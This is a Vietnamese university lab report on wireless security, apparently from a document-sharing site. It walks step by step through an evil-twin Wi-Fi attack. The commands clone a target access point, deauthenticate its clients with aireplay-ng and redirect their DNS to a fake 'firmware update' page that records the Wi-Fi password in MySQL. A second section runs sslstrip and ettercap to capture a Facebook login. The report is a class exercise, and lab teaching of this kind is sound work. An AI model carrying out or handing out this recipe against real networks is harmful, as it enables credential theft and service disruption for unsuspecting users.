1. Trang chủ
  2. » Luận Văn - Báo Cáo

An toàn mạng không dây và di động: FAKE ACCESS POINT SNIFFER PASSWORD

11 95 0

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 11
Dung lượng 809,68 KB

Các công cụ chuyển đổi và chỉnh sửa cho tài liệu này

Nội dung

Tập tin này chứa giao diện web, khi nạn nhân kết nối vào AP giả mạo, khi mở trình duyệt web sẽ bị chuyển hướng đến trang web này yêu cầu nhập mật khẩu wifi để cập nhật firmware.. Gõ lệnh

Trang 1

BÁO CÁO LAB 5

FAKE ACCESS POINT SNIFFER PASSWORD

Môn học An toàn mạng không dây và di động

GVHD: Lê Đức Thịnh

Sinh viên 1: 14520541 – Đỗ Bá Tứ Mỹ

Sinh viên 2: 14520842 – Nguyễn Hoàng Thanh

Trang 2

I LẤY MẬT KHẨU AP GỐC:

1 Cài đặt isc-dhcp-server:

Cài đặt:

apt-get update

apt-get install isc-dhcp-server

Cấu hình:

Mở tập tin: nano /etc/dhcp/dhcpd.conf

authoritative;

default-lease-time 600;

max-lease-time 7200;

subnet 192.168.1.0 netmask 255.255.255.0

{

option subnet-mask 255.255.255.0;

option broadcast-address 192.168.1.255;

option routers 192.168.1.1;

option domain-name-servers 192.168.10.1; # tùy vào từng máy

range 192.168.1.1 192.168.1.100;

}

2 Giải quyết xung đột giữa airmon-ng và Network Manager:

Trang 3

Gõ lệnh: nano /etc/NetworkManager/NetworkManager.conf

Thêm vào sau tập tin:

[keyfile]

unmanaged-devices=interface-name:wlan0mon;interface-name:wlan1mon;interface-

name:wlan2mon;interface-name:wlan3mon;interface-name:wlan4mon;interface-

name:wlan5mon;interface-name:wlan6mon;interface-name:wlan7mon;interface- name:wlan8mon;interface-name:wlan9mon;interface-name:wlan10mon;interface-name:wlan11mon;interface-name:wlan12mon

Lưu và thoát

3 Chuyển card wifi về chế độ giám sát:

Gõ lệnh: airmon-ng start wlan0

Gõ lệnh: airodump-ng wlan0mon để tiến hành lắng nghe các kết nối không đây Tìm

kiếm thông tin về mục tiêu

Trang 4

Ghi chép lại thông tin mục tiêu:

 BSSID: C8:3A:35:2E:AE:F8

 CH: 7

 ESSID: GauGau

4 Tạo AP giả:

Dùng lệnh: airbase-ng -e " GauGau" -c 7 wlan0mon để tạo một AP giả không cần mật

khẩu

Lúc này AP giả sẽ tạo ra interface at0 để bắt cầu hoặc định tuyến tới AP giả mạo

Gán IP và định tuyến mạng lớp 192.168.1.0/24 thông qua interface at0 mới tạo ra

5 Thiết lập NAT bằng cách thiết đặt luật cho tường lửa IPTABLES:

Gõ những lệnh sau:

iptables table nat append POSTROUTING out-interface eth0 -j MASQUERADE iptables append FORWARD in-interface at0 -j ACCEPT

Bật chế độ chuyển tiếp lưu lượng mạng

Trang 5

echo 1 > /proc/sys/net/ipv4/ip_forward

6 Khởi động các dịch vụ:

Chúng ta sẽ khởi động các dịch vụ isc-dhcp-server, apache2, mysql

Gõ các lệnh sau:

systemctl start isc-dhcp-server

systemctl start apache2

systemctl start mysql

7 Tạo giao diện web và cơ sở dữ liệu:

Tải tập tin rogue_AP.zip từ http://www.rootsh3ll.com/rogue-ap-download/về máy Tập tin này chứa giao diện web, khi nạn nhân kết nối vào AP giả mạo, khi mở trình duyệt web sẽ bị chuyển hướng đến trang web này yêu cầu nhập mật khẩu wifi để cập nhật firmware

Mặc định thư mục chứa mã trang web trên kali là /var/www/html Ta sẽ giải nén tập tin trên vào thư mục này

Gõ lệnh: unzip rogue_AP.zip -d /var/www/html/

Ta thấy có tập tin dbconnect.php, trong tập tin này chứa mã nguồn kết nối đến mysql server nơi lưu mật khẩu khi nạn nhân nhập vào

Cấu hình cơ sở dữ liệu này

Trang 6

Gõ lệnh: mysql -u root –p (mặc định mật khẩu trống)

Chúng ta sẽ thêm người dùng tên là “fakeap” với mật khẩu “fakeap”

Gõ lệnh: create user fakeap@localhost identified by 'fakeap';

Thêm cơ sở dữ liệu:

Gõ lệnh:

create database rogue_AP;

use rogue_AP;

create table wpa_keys(password1 varchar(32), password2 varchar(32));

Nó trông như sau:

Cấp quyền truy cập vào cơ sở dữ liệu ‘rogue_AP’ cho người dùng ‘fakeap’

Gõ lệnh: grant all privileges on rogue_AP.* to 'fakeap'@'localhost';

Kiểm tra:

Gõ lệnh: mysql -u fakeap –p (mật khẩu fakeap)

Gõ lệnh:

use rogue_AP; chuyển cơ sở dữ liệu.

insert into wpa_keys(password1, password2) values ("testpass", "testpass");

chèn dữ liệu để kiểm thử

select * from wpa_keys; in ra dữ liệu vừa nhập

Ta được kết quả:

Trang 7

Với kết quả tương tự như trên thì việc tạo cơ sở dữ liệu đã thành công.

8 Tấn công AP mục tiêu và đợi nạn nhân:

Gõ lệnh: aireplay-ng deauth 0 -a C8:3A:35:2E:AE:F8 wlan0mon

Với C8:3A:35:2E:AE:F8 là BSSID thu thập ở mục 3

deauth 0 gởi liên tục gói de-authentication đến AP mục tiêu ngắt mọi máy khách

(client) đang kết nối ra và bắt buộc họ kết nối vào AP giả mà chúng ta tạo ra

Sau một khoảng thời gian, nạn nhân nhận ra là AP gốc không thể kết nối, nhưng có AP giống tên AP gốc ở đây là ‘GauGau’, họ sẽ kết nối vào AP giả mạo này

Trang 8

Bây giờ nạn nhân đã truy cập vào AP giả mạo Chúng ta sẽ chuyển hướng nạn nhân đến trang web giả mạo đã dựng ở mục 7 để lấy mật khẩu wifi của AP gốc

Gõ lệnh: dnsspoof -i at0

Lệnh trên sẽ phân giải mọi tên miền về IP: 192.168.1.1 Tức là nạn nhân sẽ bị chuyển về web giả mạo

Trang 9

Sau khi nạn nhân nhập mật khẩu, trang web sẽ chuyển hướng vờ như là đang cập nhật firmware

Khi đó trong cơ sở dữ liệu đã có mật khẩu của AP gốc

II TẤN CÔNG MAN IN THE MIDDLE:

Mô hình:

Trang 10

Trên Kali:

Thêm luật sau vào iptables:

iptables -t nat -A PREROUTING -p tcp destination-port 80 -j REDIRECT to-port 10000

luật này chuyển hướng mọi kết nối http đến cổng 10000

Gõ lệnh: sslstrip -p –k –l 10000

Ý nghĩa lệnh trên là dùng sslstrip để chuyển giao thức https -> http và ghi log phương thức POST của giao thức http với cổng lắng nghe là 10000

Gõ lệnh: ettercap -p -u -T -q -i at0

Dùng ettercap để lắng nghe kết nối đến card mạng at0 lấy thông tin

Trên Win 7:

Người dùng kết nối đến AP giả mạo và mở trình duyệt web vào facebook.com đăng nhập

Trang 11

Kết quả là ta bắt được thông tin đăng nhập.

Ngày đăng: 12/05/2020, 15:46

TỪ KHÓA LIÊN QUAN

🧩 Sản phẩm bạn có thể quan tâm

w